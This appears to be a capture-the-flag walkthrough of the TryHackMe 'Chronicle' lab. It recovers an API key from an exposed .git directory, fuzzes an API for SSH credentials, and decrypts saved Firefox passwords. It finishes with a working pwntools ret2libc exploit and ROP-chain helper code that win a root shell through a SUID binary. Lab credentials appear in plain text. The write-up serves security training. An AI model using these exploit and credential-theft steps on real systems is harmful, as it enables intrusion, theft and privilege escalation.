
THM - Chronicle

Chronicle (good ret2libc lab) - A walkthrough of the challenge covering enumeration, exploitation and privilege escalation.



THM - Chronicle (good ret2libc lab)

NMAP

image1

http://10.10.200.236/old/

image2

```bash
gobuster dir -u http://10.10.200.236/old -w /usr/share/seclists/Discovery/Web-Content/big.txt | grep -v 302
```

image3

Found .git

image4

  • Download .git:

```bash
wget --recursive http://10.10.200.236/old/.git/ --continue
```

or use `--mirror`

  • Read the .git files (the working tree is empty, so git status lists every tracked file as deleted):

```bash
git status
```

image5

```bash
git checkout -- .
```

or

```bash
git restore .
```

image6

The deleted files are restored, but there is nothing useful in them.

  • Look at the logs and grep for "key" (git log -p prints every commit's diff, so a secret that was later removed still shows up):

```bash
git log -p | grep "key"
```

image7
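The grep above works when you already know the word to look for. As an added example that is not part of the original writeup, the Python below parses `git log -p` output itself and reports secret-looking values together with the commit, the file and whether the line was added or removed; the removed lines are the interesting ones, because a key deleted in a later commit is still present in the earlier one. The log it runs on is constructed for the example (commit hashes, author, dates and file name are made up); only the key value is the one from this writeup's ffuf command.

```python
import re

# Constructed sample of `git log -p` output, not the lab's real history. Hashes, author,
# dates and file name are invented; the key string is the one from the writeup.
SAMPLE_LOG = """commit 9b5e2c1d4f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c
Author: dev <dev@example.com>
Date:   Sun Oct 3 11:02:17 2021 +0000

    move API key to environment

diff --git a/app.py b/app.py
--- a/app.py
+++ b/app.py
@@ -1,4 +1,5 @@
+import os
 import flask
-key = "7454c262d0d5a3a0c0b678d6c0dbc7ef"
+key = os.environ["API_KEY"]
 app = flask.Flask(__name__)
commit 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b
Author: dev <dev@example.com>
Date:   Sat Oct 2 09:41:55 2021 +0000

    initial app

diff --git a/app.py b/app.py
--- /dev/null
+++ b/app.py
@@ -0,0 +1,3 @@
+import flask
+key = "7454c262d0d5a3a0c0b678d6c0dbc7ef"
+app = flask.Flask(__name__)
"""

COMMIT_RE = re.compile(r"^commit ([0-9a-f]{40})$")
FILE_RE = re.compile(r"^\+\+\+ b/(.+)$")
# Assignment of a secret-looking name to a quoted value; the name list is a heuristic.
SECRET_RE = re.compile(r"""\b(\w*(?:key|secret|token|passw(?:or)?d)\w*)\s*[=:]\s*["']([^"']{8,})["']""", re.I)
# Fallback: bare 32..64 hex chars (MD5/SHA-style API keys and hashes).
HEX_RE = re.compile(r"\b[0-9a-f]{32,64}\b")


def scan_git_log(text):
    """Walk `git log -p` output and return every secret-looking value with the commit it was
    seen in, the file, and '+' (added) or '-' (removed) for the diff line it came from."""
    hits = []
    commit = path = None
    for line in text.splitlines():
        m = COMMIT_RE.match(line)
        if m:
            commit, path = m.group(1), None
            continue
        m = FILE_RE.match(line)
        if m:
            path = m.group(1)
            continue
        # Only added/removed content lines; skip the +++/--- file headers and context lines.
        if not line or line[0] not in "+-" or line.startswith(("+++", "---")):
            continue
        body = line[1:]
        m = SECRET_RE.search(body)
        value = m.group(2) if m else None
        if value is None:
            m = HEX_RE.search(body)
            value = m.group(0) if m else None
        if value:
            hits.append({"commit": (commit or "?")[:8], "file": path,
                         "change": line[0], "value": value})
    return hits


def still_in_history(hits):
    """Values that were removed in some commit but were added in another, i.e. secrets the
    developer 'deleted' that anyone with the .git directory can still read."""
    removed = {h["value"] for h in hits if h["change"] == "-"}
    added = {h["value"] for h in hits if h["change"] == "+"}
    return sorted(removed & added)


if __name__ == "__main__":
    found = scan_git_log(SAMPLE_LOG)
    for h in found:
        print(f'{h["commit"]} {h["change"]} {h["file"]}: {h["value"]}')
    print("deleted but recoverable:", still_in_history(found))
```

On a real repository, feed it `git log -p --all` so secrets on other branches and in unreachable-but-packed commits are not missed.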

http://10.10.200.236:8081/forgot

image8

image9

image10

image11

Open in Burp:

image12

image13

Try changing the key value:

image14

Try the API key found in the git logs:

image15

This time the response is "Invalid Username", so the key works.

image16

image17

  • Fuzz for the right username with the valid key (API fuzzing; -fw 2 hides the two-word "Invalid Username" responses):

```bash
ffuf -w /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -X POST -d '{"key":"7454c262d0d5a3a0c0b678d6c0dbc7ef"}' -u http://10.10.200.236:8081/api/FUZZ -fw 2
```

image18

image19

{"username":"tommy","password":"DevMakesStuff01"}

Credentials to SSH:

image20

```bash
cat user.txt
```

image21

```bash
last
```

image22

Two new IPs in the login history: 192.168.29.217 and 192.168.166.1

But the box has no interface on those networks:

image23

carlJ has a .mozilla directory

image24

Copy the directory to /tmp, serve it over HTTP from the target (port 8082), and pull it over to Kali:

image25

```bash
wget http://10.10.200.236:8082/.mozilla/ --recursive --continue
```

  • Use firefox_decrypt to get the password:

image26

The second profile requires a Primary Password to unlock it.

Tried some simple passwords; password1 worked.

image27

Username: dev

Password: Pas$w0RD59247

  • su to carlJ

image28

  • Looking in mailing/ there is an executable with the SUID bit set (buffer overflow?)

image29

image30

Seg fault on option 2:

image31

  • Check protections:

```bash
checksec smail
```

or

```bash
pwn checksec smail
```

image32

No PIE, so the binary's own addresses (its gadgets and the ret used below) are fixed. Whether libc is loaded at a fixed address too depends on the system's ASLR setting, so check that next.

  • Check whether ASLR is enabled on the system:

```bash
cat /proc/sys/kernel/randomize_va_space
```

image33

0 means NO (ASLR is off; the usual default is 2, which randomizes the stack, heap and shared libraries)

  • Because ASLR is not enabled, we don't need a leak to find the libc base. Instead:

  • Getting libc and its base:

```bash
ldd smail
```

image34

Gives the load address of libc, which can be trusted because ASLR is off.

A mapped library is page-aligned, so the base address should end in three zero hex digits, which it does:

0x7ffff79e2000

  • Getting the location of system():

```bash
readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep system
```

The -s flag tells readelf to dump the symbol table, which includes the exported functions

image35

1403: 000000000004f550 45 FUNC WEAK DEFAULT 13 system@@GLIBC_2.2.5

The offset of system from libc base is: 0x4f550

(system = libc_base + 0x4f550)

  • Getting the location of /bin/sh:

Since /bin/sh is just a string, we can search for it with strings in the libc we found with ldd.

Note that a string argument is passed as a pointer (the address where the bytes live), not as the bytes of the string themselves; that is how C, and therefore system(), expects it.

```bash
strings -a -t x /lib/x86_64-linux-gnu/libc.so.6 | grep /bin/sh
```

-a tells it to scan the entire file

-t x tells it to print each offset in hex

image36

/bin/sh address: 0x1b3e1a

  • Because this is a 64-bit arch:
    1. The first argument is passed in RDI, not on the stack after the return address, so we need a pop rdi; ret gadget to load the address of /bin/sh before returning into system():

```bash
ROPgadget --binary smail | grep rdi
```

image37

ROPgadget searches a binary for gadgets. It supports several file formats and architectures and uses the Capstone disassembler as its search engine.

pop rdi; ret address: 0x4007f3

    2. Find the address of a plain ret instruction (a no-op gadget used to fix the stack alignment before system() runs):

```bash
objdump -d smail | grep ret
```

image38

Return address: 0x400556

  • Copy smail over to Kali
  • chmod +x smail
  • Open it with gdb (gef):

```bash
gdb smail
```

image39

pattern create (copy the generated pattern)

image40

r to run

Paste the pattern into the signature prompt

image41

  • Find the offset:

```bash
pattern search $rsp
```

image42

  • Create the payload (pwntools):

```python
#!/usr/bin/python3

from pwn import *

p = process('./smail')

# Addresses: libc base from ldd (stable because ASLR is off), offsets from readelf/strings,
# gadgets from ROPgadget/objdump on smail (fixed because there is no PIE)
libc_base = 0x7ffff79e2000
system = libc_base + 0x4f550      # system@@GLIBC_2.2.5
binsh = libc_base + 0x1b3e1a      # "/bin/sh" string inside libc
POP_RDI = 0x4007f3                # pop rdi; ret gadget
RET = 0x400556                    # plain ret, used for stack alignment

# Build the payload: padding up to the saved return address, then the ROP chain
payload = b'A' * 72               # offset found with pattern search
payload += p64(RET)               # extra ret keeps rsp 16-byte aligned when system() is entered
payload += p64(POP_RDI)           # pop rdi; ret
payload += p64(binsh)             # rdi = address of "/bin/sh"
payload += p64(system)            # system("/bin/sh")
payload += p64(0x0)               # return address for system(); not reached cleanly

# Drive the menu: option 2 is the vulnerable signature input
p.clean()
p.sendline(b'2')
p.sendline(payload)
p.interactive()
```

  • Root shell!

image43

  • If you get an EOF message, the process crashed instead of giving a shell; check your addresses again to make sure they are correct

image44
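Pulling the address work above together, as an added example that is not part of the original writeup and uses plain `struct` instead of pwntools so it runs anywhere: the Python below parses the `readelf` and `strings` output lines shown earlier into offsets, resolves absolute addresses from the libc base, builds the chain, and checks the one thing that most often turns a correct-looking 64-bit ret2libc chain into the EOF crash above, the 16-byte stack alignment at system()'s entry. The constants are this writeup's values and apply only to this lab's smail and libc build; the alignment check assumes the overwritten return address is popped from a normally aligned frame, as it is here.

```python
import struct

# Values from this writeup. They are specific to the lab's smail binary and libc build;
# on another target they differ and must be re-derived with the same tools.
LIBC_BASE = 0x7ffff79e2000   # ldd smail; stable only because randomize_va_space is 0
SYSTEM_OFF = 0x4f550         # readelf -s libc.so.6 | grep system
BINSH_OFF = 0x1b3e1a         # strings -a -t x libc.so.6 | grep /bin/sh
POP_RDI_RET = 0x4007f3       # ROPgadget --binary smail | grep rdi (fixed: no PIE)
RET = 0x400556               # objdump -d smail | grep ret
PADDING = 72                 # gef: pattern search $rsp


def p64(value):
    """Little-endian 8-byte encoding, the same thing pwntools' p64 does on amd64."""
    return struct.pack("<Q", value)


def parse_readelf_symbol(line, name):
    """Offset of `name` from one `readelf -s` line (the page's line for system)."""
    fields = line.split()
    symbol = fields[-1].split("@")[0]          # strip the @@GLIBC_2.2.5 version suffix
    if symbol != name:
        raise ValueError(f"line is for {symbol}, not {name}")
    return int(fields[1], 16)


def parse_strings_offset(line):
    """Offset from one `strings -t x` line such as ' 1b3e1a /bin/sh'."""
    offset, _text = line.split(None, 1)
    return int(offset, 16)


def libc_addresses(libc_base, system_off=SYSTEM_OFF, binsh_off=BINSH_OFF):
    """Absolute addresses from a base plus offsets. The base is a constant here because ASLR
    is off; with ASLR on, the same code works with a base computed from a leaked pointer."""
    if libc_base & 0xfff:
        raise ValueError("libc base is not page-aligned: the ldd value or the leak is wrong")
    return {"system": libc_base + system_off, "binsh": libc_base + binsh_off}


def build_chain(libc_base=LIBC_BASE, padding=PADDING, align=True):
    """padding | [ret] | pop rdi; ret | &"/bin/sh" | system | dummy return address."""
    addr = libc_addresses(libc_base)
    words = ([RET] if align else []) + [POP_RDI_RET, addr["binsh"], addr["system"], 0]
    return b"A" * padding + b"".join(p64(w) for w in words)


def chain_words(payload, padding=PADDING):
    """Decode the qwords after the padding so the chain can be inspected."""
    raw = payload[padding:]
    return [struct.unpack("<Q", raw[i:i + 8])[0] for i in range(0, len(raw), 8)]


def system_entry_aligned(words, system_addr, ret_slot_mod16=8):
    """Stack alignment at system()'s first instruction.

    ret_slot_mod16 is rsp mod 16 at the moment the overwritten return address is popped; a
    normal frame gives 8 (the call pushed 8 bytes onto a 16-byte-aligned stack). Every slot
    the chain consumes adds 8. The ABI requires rsp % 16 == 8 at function entry and glibc's
    system() relies on it (a movaps on a stack address faults otherwise). An odd number of
    slots before system() fixes the parity, which is what the extra ret is for."""
    consumed = words.index(system_addr) + 1
    return (ret_slot_mod16 + 8 * consumed) % 16 == 8


if __name__ == "__main__":
    addr = libc_addresses(LIBC_BASE)
    for align in (True, False):
        words = chain_words(build_chain(align=align))
        print("with ret   " if align else "without ret",
              [hex(w) for w in words],
              "aligned" if system_entry_aligned(words, addr["system"]) else "MISALIGNED")
```

Running it prints the chain twice: with the extra ret the call into system() lands on a correctly aligned stack, without it the same chain reaches system() with rsp off by 8, which is the usual cause of a crash (and the EOF in pwntools) when every address is otherwise right.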

This post is licensed under CC BY 4.0 by the author.